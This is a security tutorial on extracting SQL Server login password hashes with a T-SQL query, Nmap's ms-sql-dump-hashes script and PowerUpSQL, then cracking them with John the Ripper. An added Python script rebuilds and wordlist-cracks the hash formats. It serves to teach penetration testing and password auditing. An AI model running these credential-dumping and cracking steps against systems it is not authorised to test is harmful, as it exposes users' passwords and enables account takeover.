In this article, we will learn several ways to dump the password hashes of MSSQL logins. The stored hash format differs across SQL Server versions: SQL Server 2000 and SQL Server 2005 through 2008 R2 store SHA-1 based hashes under the 0x0100 header, while SQL Server 2012 and later store SHA-512 hashes under the 0x0200 header, so the cracking format has to match the version you dumped from. We performed our practical on SQL Server 2016. Once we have the hashes, we will crack them with JohnTheRipper.
Table of Content
· Introduction to Hashing in SQL server
· CLI
· Nmap
· PowerUpSQL
· JohnTheRipper
Introduction to Hashing in SQL server
SQL Server keeps the hash of every SQL-authenticated login in the password_hash column of sys.sql_logins as a varbinary value, which the tools below display as a hex string. On SQL Server 2012 and later the value is 70 bytes long: a 2-byte version header (0x0200), a 4-byte random salt, and a 64-byte SHA-512 digest computed over the UTF-16LE encoding of the password followed by the salt. SQL Server 2005 through 2008 R2 use the 0x0100 header with a 20-byte SHA-1 digest over the same input, and SQL Server 2000 additionally appends a second SHA-1 digest of the upper-cased password, which is why its logins can be cracked case-insensitively. A hash produced in SQL Server looks somewhat like the following:
CLI
If you already have a SQL session on the server, the quickest way to get the hashes of all SQL logins is the following query:
SELECT * FROM sys.sql_logins
To get the hash of a particular login, for example sa, use the following query:
select name,password_hash from sys.sql_logins where name='sa'
As you can see, both of the above queries give us the desired result. Note that the password_hash column is only populated for callers holding the CONTROL SERVER permission (sysadmin members have it); a less privileged login sees NULL in that column.
Nmap
We can also retrieve the hashes remotely using Nmap's ms-sql-dump-hashes NSE script, which logs in with the supplied credentials and reads sys.sql_logins for us. The command to do so is the following:
nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@1 192.168.1.146
The account you authenticate with needs the same CONTROL SERVER permission as in the CLI section, otherwise the script returns no hashes. As the result of the above command, we have our hash.
PowerUpSQL
To the hashes remotely, PowerUpSQL provides a
simple command which is as follows:
Import-Module .\PowerUpSQL.ps1
Get-SQLServerPasswordHash -username sa
-Password Password@1 -instance
WIN-P83OS778EQK\SQLEXPRESS -Verbose
These are the multiple ways to retrieve the
hashes for the MSSQL server, both remotely and locally.
JohnTheRipper
Now that we have acquired the hashes, all we have to do is crack them. For this, we will use the almighty password cracker, JohnTheRipper. Save the dumped hash (with its 0x0200 prefix) to a file, here called hash, and point john at a wordlist, here called pass. Because our target is SQL Server 2016, the format is mssql12; for a SQL Server 2005 to 2008 R2 hash you would use mssql05, and for SQL Server 2000 the case-insensitive mssql format:
john --format=mssql12 --wordlist=pass hash
The result shows us that the password is Password@1, which is accurate (john --show hash prints cracked passwords again later). The equivalent hashcat mode for 2012+ hashes is 1731. So, this way, one can dump and then crack MSSQL hashes.
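To make the hash layout from the introduction and the cracking step concrete, here is an added Python example (not code from the original article, PowerUpSQL or john). It rebuilds a SQL Server login hash from a password and salt for the 2000, 2005 and 2012+ layouts, parses a dumped hash back into header, salt and digest, picks the matching john format, and runs a small wordlist attack. The salt and the wordlist are constructed for the demo; a real server picks a random 4-byte salt per login.

```python
import hashlib
from typing import Dict, Iterable, Optional

# Constructed salt for the demo (a real login gets 4 random bytes).
DEMO_SALT = bytes.fromhex("a1b2c3d4")

# john --format value for each layout.
JOHN_FORMATS = {"2000": "mssql", "2005": "mssql05", "2012": "mssql12"}


def make_mssql_hash(password: str, salt: bytes, version: str = "2012") -> str:
    """Build a login hash the way sys.sql_logins.password_hash stores it.

    Layout: 2-byte header || 4-byte salt || digest(UTF-16LE(password) || salt)
      2000 : 0x0100, SHA-1 digest, then a second SHA-1 of the upper-cased password
      2005 : 0x0100, SHA-1 digest
      2012+: 0x0200, SHA-512 digest
    Returned as the 0x-prefixed hex string the CLI and Nmap output show.
    """
    if len(salt) != 4:
        raise ValueError("SQL Server salts are 4 bytes")
    pw = password.encode("utf-16-le")
    if version == "2012":
        header, body = b"\x02\x00", hashlib.sha512(pw + salt).digest()
    elif version == "2005":
        header, body = b"\x01\x00", hashlib.sha1(pw + salt).digest()
    elif version == "2000":
        upper = password.upper().encode("utf-16-le")
        header = b"\x01\x00"
        body = hashlib.sha1(pw + salt).digest() + hashlib.sha1(upper + salt).digest()
    else:
        raise ValueError("unknown SQL Server hash version: " + version)
    return "0x" + (header + salt + body).hex().upper()


def parse_mssql_hash(hash_str: str) -> Dict[str, object]:
    """Split a dumped hash into version, salt and digest; rejects other lengths."""
    h = hash_str.strip()
    if h.lower().startswith("0x"):
        h = h[2:]
    raw = bytes.fromhex(h)
    header, salt, digest = raw[:2], raw[2:6], raw[6:]
    if header == b"\x02\x00" and len(digest) == 64:
        version = "2012"
    elif header == b"\x01\x00" and len(digest) == 20:
        version = "2005"
    elif header == b"\x01\x00" and len(digest) == 40:
        version = "2000"
    else:
        raise ValueError("not a recognised SQL Server password hash")
    return {"version": version, "salt": salt, "digest": digest}


def john_format_for(hash_str: str) -> str:
    """Name of the john --format that matches the dumped hash."""
    return JOHN_FORMATS[parse_mssql_hash(hash_str)["version"]]


def check_candidate(hash_str: str, candidate: str) -> bool:
    """Recompute the digest with the dumped salt and compare (what john does per guess).

    For the 2000 layout both SHA-1 digests are compared, so this check is
    case-sensitive even though john's mssql format attacks the upper-cased one.
    """
    parsed = parse_mssql_hash(hash_str)
    guess = make_mssql_hash(candidate, parsed["salt"], parsed["version"])
    return parse_mssql_hash(guess)["digest"] == parsed["digest"]


def crack(hash_str: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try each word against the hash; return the first match or None."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if check_candidate(hash_str, word):
            return word
    return None


if __name__ == "__main__":
    # Constructed demo: hash the article's password, then recover it from a tiny wordlist.
    dumped = make_mssql_hash("Password@1", DEMO_SALT, "2012")
    print("sa:" + dumped)                      # line you would feed to john
    print("john --format=" + john_format_for(dumped))
    print("cracked:", crack(dumped, ["123456", "password", "Password@1"]))
```

The `sa:` prefix on the printed line is optional for john but keeps the login name next to its hash in the output of `john --show`.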